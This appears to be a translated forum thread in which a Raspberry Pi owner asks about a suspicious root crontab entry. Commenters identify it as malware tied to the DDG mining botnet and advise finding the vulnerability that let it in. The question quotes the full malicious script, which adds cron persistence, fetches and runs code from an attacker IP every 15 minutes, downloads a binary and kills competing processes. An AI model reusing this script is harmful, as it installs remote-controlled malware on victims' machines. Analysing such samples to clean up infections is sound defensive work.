Raspberry Piのルートcrontabファイルに何かを追加したかったのですが、Googleでその一部を検索しても疑わしいエントリが見つかりませんでした。
crontabエントリ:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
内容は次のhttp://103.219.112.66:8000/i.sh
とおりです。
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
Linuxの知識は限られていますが、インドネシアのサーバーからバイナリをダウンロードしてrootとして定期的に実行するのは普通のことではないようです。
これは何ですか?私は何をすべきか?
16
円形です。15分ごとに、自身の新しいコピーをダウンロードしてインストールします。リモートサーバー上のコピーが変更された場合、このcronjobを実行しているすべてのサーバーは、15分以内に新しいコードが実行されます。
—
ワイルドカード
ラズベリーパイはインターネットに公開されていますか?あなたのラズベリーパイは何を実行していますか?これは、xribfa4を検索したときのGoogleでの唯一の結果です。これを行う必要があるソフトウェアを実行していない場合、これはおそらくウイルスです。
—
kemotep
@kemotepの文字列はランダムですが、IPを検索するといくつかの結果が得られます。ddgマイニングボットネットに関する何か
—
frostschutz
見つけた。IPがインドネシア政府のサイトに登録されているのはおかしい。また、このペイロードを配信する他のIPがほぼ2000個あるようです。
—
ケモテプ
主な注意点は、crontabエントリを削除しても、システムに感染を許す脆弱性が残っている可能性が高いことです。その脆弱性を見つけて修正する必要があります。
—
ハンスマーティンモスナー